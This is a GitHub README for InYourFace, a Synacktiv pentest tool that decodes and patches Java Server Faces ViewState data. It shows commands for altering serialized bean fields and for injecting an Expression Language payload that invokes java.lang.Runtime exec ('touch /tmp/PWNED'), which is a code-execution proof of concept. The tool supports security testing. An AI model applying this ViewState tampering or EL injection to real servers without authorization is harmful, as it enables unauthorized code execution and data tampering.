inyourface/README at master · Synacktiv-contrib/inyourface · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156

-- Introduction -------------------------------------------------

 InYourFace is a software that can be used to patch JSF ViewState.
 It is based on the jdeserialize library:

 http://code.google.com/p/jdeserialize/


-- Disclaimer --------------------------------------------------

 The authors of this tool takes no responsibility for the way
 you use this tool. You are responsible for your own actions.


-- Compilation -------------------------------------------------

 You can easily compile this tool with Ant. However, if you want to
 prove that you are a Java Compilation Master Certified, I let you
 find the suitable "javac" command yourself :]


-- Usage -------------------------------------------------------

 $> ./inyourface.sh -h
 Usage: inyourface [options] <viewstate_file>
   Options:
     -h, -help
        Display this message
        Default: false
     -outfile
        Patched output file (default: stdout)
     -patch
        Patch class field (<obj_addr> <field_name> <value>)
        Default: []
     -pretty
        Pretty print
        Default: false
     -raw
        Raw output
        Default: false
     -rawpatch
        Patch blockdata (<start_offset> <end_offset> <blockdata_file>)
        Default: []


-- Patch a class field -----------------------------------------

 1. detect the field to patch:

 $> ./inyourface.sh /tmp/viewstate.txt
 [...]
 [instance 0x7e002b: 0x7e002a/com.itinpractice.beans.ProfileBean
   s_offset: 921 / e_offset: 1109
   field data:
     0x7e002a/com.itinpractice.beans.ProfileBean:
         password: r0x7e0029: [String 0x7e0029: "testtest"]
         address: r0x7e0025: [String 0x7e0025: "17 rue plop 75001 Paris"]
         username: r0x7e002c: [String 0x7e002c: "rdub"]
         lastname: r0x7e0028: [String 0x7e0028: "dubourguais"]
         firstname: r0x7e0027: [String 0x7e0027: "renaud"]
         userId: 2
         email: r0x7e0026: [String 0x7e0026: "renaud.dubourguais@synacktiv.com"]
 ]
 [...]

 2. patch the class field:

 $> ./inyourface.sh -outfile /tmp/patched.txt -patch 0x7e002b username "TEST" /tmp/viewstate.txt
 [...]
 patching instance
 field to patch @ from 1102 to 1109 | [String 0x7e002c: "rdub"]
 new patch object registered / s_offset=1102 / e_offset=1109 / value=TEST
 patching object @  s_offset=1102 / e_offset=1109 / size=7 / value=TEST

 3. check the changes:

 $> ./inyourface.sh /tmp/patched.txt
 [...]
 [instance 0x7e002b: 0x7e002a/com.itinpractice.beans.ProfileBean
   s_offset: 921 / e_offset: 1109
   field data:
     0x7e002a/com.itinpractice.beans.ProfileBean:
         password: r0x7e0029: [String 0x7e0029: "testtest"]
         address: r0x7e0025: [String 0x7e0025: "17 rue plop 75001 Paris"]
         username: r0x7e002c: [String 0x7e002c: "TEST"]
         lastname: r0x7e0028: [String 0x7e0028: "dubourguais"]
         firstname: r0x7e0027: [String 0x7e0027: "renaud"]
         userId: 2
         email: r0x7e0026: [String 0x7e0026: "renaud.dubourguais@synacktiv.com"]
 ]
 [...]


-- Patch a blockdata -------------------------------------------

 1. detect the blockdata:

 $> ./inyourface.sh /tmp/viewstate.txt
 [...]
 [instance 0x7e000f: 0x7e000e/org.apache.el.ValueExpressionImpl
   s_offset: 387 / e_offset: 468
   object annotations:
     org.apache.el.ValueExpressionImpl
         [blockdata from 441 to 465: 23 bytes]
            raw: \x17\x00\x03\x74\x62\x6c\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74
            from 442 to 445: 3 bytes: tbl
            from 447 to 463: 16 bytes: java.lang.Object

         NULL
         NULL

   field data:
     0x7e000c/javax.el.Expression:
     0x7e000b/javax.el.ValueExpression:
 ]
 [...]

 2. patch the blockdata:

 $> ./inyourface.sh -outfile /tmp/patched.txt -rawpatch 441 465 /tmp/patch.txt /tmp/viewstate.txt

 3. check the patch:

 $> ./inyourface.sh /tmp/patched.txt
 [...]
 [instance 0x7e000f: 0x7e000e/org.apache.el.ValueExpressionImpl
   s_offset: 387 / e_offset: 655
   object annotations:
     org.apache.el.ValueExpressionImpl
         [blockdata from 441 to 652: 210 bytes]
            raw: \xd2\x00\xbe\x23[...]\2e\x4f\x62\x6a\x65\x63\x74
            from 442 to 632: 190 bytes: #{request.getClass().getClassLoader().loadClass('java.lang.Runtime').getDeclaredMethods()[6].invoke(null).exec('touch /tmp/PWNED')}
            from 634 to 650: 16 bytes: java.lang.Object

   field data:
     0x7e000c/javax.el.Expression:
     0x7e000b/javax.el.ValueExpression:
 ]
 [...]


-- JDeserialize vs InYourFace ----------------------------------

 Patches are available in the "patches" directory.
 It allows to add features required by InYourFace from a clean
 jdeserialize build.


-- Contact -----------------------------------------------------

 This tool is provided by Synacktiv with no warranties and delivered
 "as is".

 For questions, bug reports, ideas and contributions please contact
 renaud.dubourguais@synacktiv.com or nicolas.collignon@synacktiv.com.